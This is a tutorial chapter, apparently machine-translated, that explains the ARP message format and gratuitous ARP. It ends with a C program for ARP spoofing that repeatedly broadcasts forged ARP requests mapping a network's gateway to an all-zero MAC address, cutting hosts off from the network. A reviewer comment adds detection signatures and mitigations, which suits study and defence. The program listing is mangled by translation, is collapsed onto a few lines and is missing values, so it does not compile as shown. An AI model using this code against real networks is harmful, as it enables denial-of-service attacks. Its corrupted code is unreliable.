0. Preface
This chapter mainly covers the ARP message format, how a host sends and processes ARP messages, and gratuitous ARP.
1. Principle of ARP protocol
ARP stands for Address Resolution Protocol. A host on a network has both an IP address and a MAC address; the link layer sends frames using the MAC hardware address, so the IP address has to be converted to a 48-bit MAC address, and that is what ARP is for.
In the example below there are two hosts, and host 239 pings host 238. When the local ARP cache has no entry for host 238, an ARP broadcast request is sent; viewing the ARP cache afterwards with the arp command shows the MAC address of host 238.
Using the Tcpdump tool to view the underlying data stream under Linux, you can learn:
The sequence diagram and the ARP cache are as follows:
To view the ARP cache results on a 239 host:
2. ARP protocol format
The ARP message format is shown in the figure (found via Baidu). In the example above, for the ARP request that was sent, the Ethernet source address is host 239's and the Ethernet destination address is FF:FF:FF:FF:FF:FF; the sender Ethernet address and IP address are host 239's, the target Ethernet address is all zeros, and the target IP address is 172.16.17.238.
3. Gratuitous ARP
In a gratuitous ARP, the host sends an ARP request for its own address: the target IP address and the sender IP address are both its own, the Ethernet source address, the target Ethernet address and the sender Ethernet address are its own MAC address, and the destination address in the Ethernet header is the broadcast address FF:FF:FF:FF:FF:FF.
This serves two purposes: one is to detect a duplicate IP address, and the other is to update the MAC address that hosts on the same network segment hold for this IP in their ARP caches.
The second purpose has several uses. One is primary/standby failover: the primary and the standby machine share a VIP (virtual IP), and the ARP caches of the other servers hold the mapping VIP -> primary's MAC. When the standby detects that the primary is down, it sends a gratuitous ARP, which updates the other servers' ARP caches to VIP -> standby's MAC and so completes a simple failover.
The same mechanism can also be abused, for ARP spoofing, data eavesdropping, and so on. ARP carries no authentication, so a receiving host cannot tell a legitimate update from a forged one.
4. ARP Spoofing
ARP spoofing is built on this behaviour of ARP. It can be used to attack a host or a router so that it can no longer reach the Internet; the "Network Law Enforcement Officer" tool works on this principle. The following program sends a simple gratuitous ARP that changes the gateway's entry in the ARP caches of hosts on the same network segment (172.16.17.*), mapping it to a nonexistent MAC address.
The program is written in C; it creates a socket of type AF_PACKET to manipulate link-layer data directly. It has been tested on the company's internal network.
/*
 * Reviewer notes on the listing below.
 *
 * State of the text: the program was collapsed onto three physical lines and
 * its keywords and identifiers were altered by machine translation
 * ("#defineHard_type_ether", "Unsigned ShortShardtype", "Ten", "-I.").
 * Two numeric literals are lost ("apkg[ -]" and "usleep ( -)"), so the
 * buffer size and the send interval cannot be recovered from this page, and
 * the text does not compile as shown. It is kept unchanged for that reason.
 *
 * What the visible code does:
 *   - Asctohex/Gethex turn a hex string into bytes; Hosttonetbyte copies a
 *     byte array in reverse order and returns the number of bytes copied.
 *   - Buildarppkg serialises the arppkg fields in ARP wire order:
 *     hardware type, protocol type, the two address lengths, operation,
 *     sender MAC, sender IP, target MAC, target IP.
 *   - main builds one ARP request with sender MAC "000000000000",
 *     sender IP "Ac1011fe" (172.16.17.254, per the inline comment),
 *     target MAC "ffffffffffff" and target IP "Ac1011fe", then sends the
 *     same buffer in an endless loop on an AF_PACKET / SOCK_DGRAM socket.
 *
 * What this looks like on the wire (useful for detection): an ARP request
 * whose sender and target protocol addresses are equal (a gratuitous ARP),
 * whose sender hardware address is all zeros, and which repeats
 * continuously for the gateway's address. A gateway IP that suddenly
 * resolves to a different or all-zero MAC in host ARP caches is the
 * corresponding host-side symptom.
 *
 * Mitigations: switch-level ARP validation (dynamic ARP inspection backed by
 * DHCP snooping bindings), a static ARP entry for the gateway on critical
 * hosts, and ARP-change monitoring on the segment.
 *
 * Robustness defects visible in the helpers:
 *   - Gethex returns c + 10 unchanged for any character that is neither a
 *     digit nor a letter, so malformed input is not rejected.
 *   - Asctohex reads pasc[i + 1] without checking for an odd-length string
 *     and writes to phex without consulting the capacity passed in
 *     *phexlen; the 7-byte ahostbyte buffer therefore relies on callers
 *     passing at most 14 hex digits.
 *   - The return value of socket() is never checked, and close() after
 *     while(1) is unreachable.
 */
#include <sys/socket.h>#include<sys/types.h>#include<netpacket/packet.h>#include<net/ethernet.h>#include<linux/if_ether.h>#include<string.h>#include<arpa/inet.h>#include<stdlib.h>#include<assert.h>#include<stdio.h>#include<net/if.h>#include<errno.h>#defineHard_type_ether 0x01//Hardware Type#defineProtocol_ip 0x01//IP protocol Type#defineMac_addr_len 0x06//Hardware Address Length#defineIp_addr_len 0x04//IP Address Length#defineArp_op_request 0x01//ARP Request operation#defineArp_op_response 0x02//ARP response operation//ARP Messagestypedefstructarppkg{unsigned ShortShardtype;//Hardware TypeUnsigned ShortSprotocoltype;//protocol TypeUnsignedCharChardaddrlen;//Hardware Address LengthUnsignedCharCipaddrlen;//mapped protocol address lengthUnsigned ShortSoptype;//type of OperationunsignedCharasendmac[6];//Sender MAC AddressUnsignedCharasendip[4];//Sender IP AddressUnsignedCharadstmac[6];//Destination MAC addressUnsignedCharadstip[4];//Destination IP Address} arppkg;//converts a native byte order to a network byte order//and returns the offset lengthintHosttonetbyte (Char*pnet, unsignedChar*ahostbyte,intNlen) { intI, J; for(i = Nlen-1, j =0; I >=0; -I. 
J + +) {Pnet[j]=Ahostbyte[i]; } returnJ;}Static intGethex (CharCASC) { if(IsDigit (CASC))returnCASC-'0'; if(Isalpha (CASC)) CASC= ToLower (CASC)-'a'; returnCASC +Ten;}//convert ASC to HexintAsctohex (Const Char*PASC,Char*phex,int*Phexlen) { intI, Nhexlen; intNasclen =strlen (PASC); for(i =0, Nhexlen =0; i < Nasclen; i + =2) {Phex[nhexlen+ +] = (Gethex (pasc[i]) <<4) | (Gethex (Pasc[i +1]) &0xF);//High byte | low byte } *phexlen =Nhexlen; return 0;}//Convert string to hex and then to network byte orderintAsctonetbyte (Char*PASC, unsignedChar*pnetbyte) {unsignedCharahostbyte[7]; intNhostbytelen =sizeof(Ahostbyte); Asctohex (PASC, (Char*) Ahostbyte, &Nhostbytelen); returnhosttonetbyte (Pnetbyte, Ahostbyte, Nhostbytelen);}//group ARP message and return the message lengthintBuildarppkg (arppkg * parppkg,Char*pPkg) { intNPos =0; NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->shardtype,2); NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->sprotocoltype,2); Ppkg[npos+ +] = parppkg->Chardaddrlen; Ppkg[npos+ +] = parppkg->Cipaddrlen; NPos+ = Hosttonetbyte (pPkg + NPos, (Char*) &parppkg->soptype,2); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->asendmac,6); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->asendip,4); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->adstmac,6); NPos+ = Hosttonetbyte (pPkg + NPos, Parppkg->adstip,4); returnNPos;}//initializing ARP Public informationStatic voidInitarpcommfield (arppkg * parppkg,intNoptype) {parppkg->shardtype = Hard_type_ether;//Ethernet TypeParppkg->sprotocoltype = eth_p_ip;//IP Packet ProtocolParppkg->chardaddrlen =Mac_addr_len; Parppkg->cipaddrlen =Ip_addr_len; Parppkg->soptype =Noptype;}//Group ARP Request messageintBuildarprequest (unsignedChar*ppkg,Char*PSENDMACSTR,Char*PSENDIPSTR,Char*PDSTMACSTR,Char*pdstipstr) {arppkg starppkg; memset (&starppkg,0,sizeof(arppkg)); Initarpcommfield (&starppkg, arp_op_request); Asctonetbyte (Psendmacstr, Starppkg.asendmac); Asctonetbyte (Psendipstr, Starppkg.asendip); Asctonetbyte 
(Pdstmacstr, Starppkg.adstmac); Asctonetbyte (Pdstipstr, Starppkg.adstip); returnBuildarppkg (&starppkg, pPkg);}intMainintargcChar Const*argv[]) { Char*pmac ="ffffffffffff";//Purpose Mac Broadcast Char*pdstip ="Ac1011fe";//Destination IP 172.16.17.254 Char*ptrickmac ="000000000000";//Fake Mac Char*ptrickip ="Ac1011fe";//the ip,172.16.17.254 of disguiseUnsignedCharamacbyte[7]; intNFd = socket (Af_packet, SOCK_DGRAM,0); //Initialize link address information structSockaddr_ll sockaddr; memset (&SOCKADDR,0,sizeof(structsockaddr_ll)); Sockaddr.sll_family=htons (Af_packet); Sockaddr.sll_protocol=htons (ETH_P_ARP); Sockaddr.sll_halen= Htons (6); Asctonetbyte (Ptrickmac, amacbyte); memcpy (Sockaddr.sll_addr, Amacbyte,6); Sockaddr.sll_ifindex= Iff_broadcast;//Broadcast//Create a free ARP Request messageUnsignedCharapkg[ -] = {0}; intNpkglen =buildarprequest (aPkg, Ptrickmac, Ptrickip, PMac, Pdstip); //To send an ARP request continuously while(1) { intNret = SendTo (NFd, aPkg, Npkglen,0, (structSOCKADDR *) &sockaddr,sizeof(sockaddr)); if(Nret = =-1) {perror ("Error"); Exit (-1); } usleep ( -); } close (nFd); return 0;}
Talking about ARP protocol and its application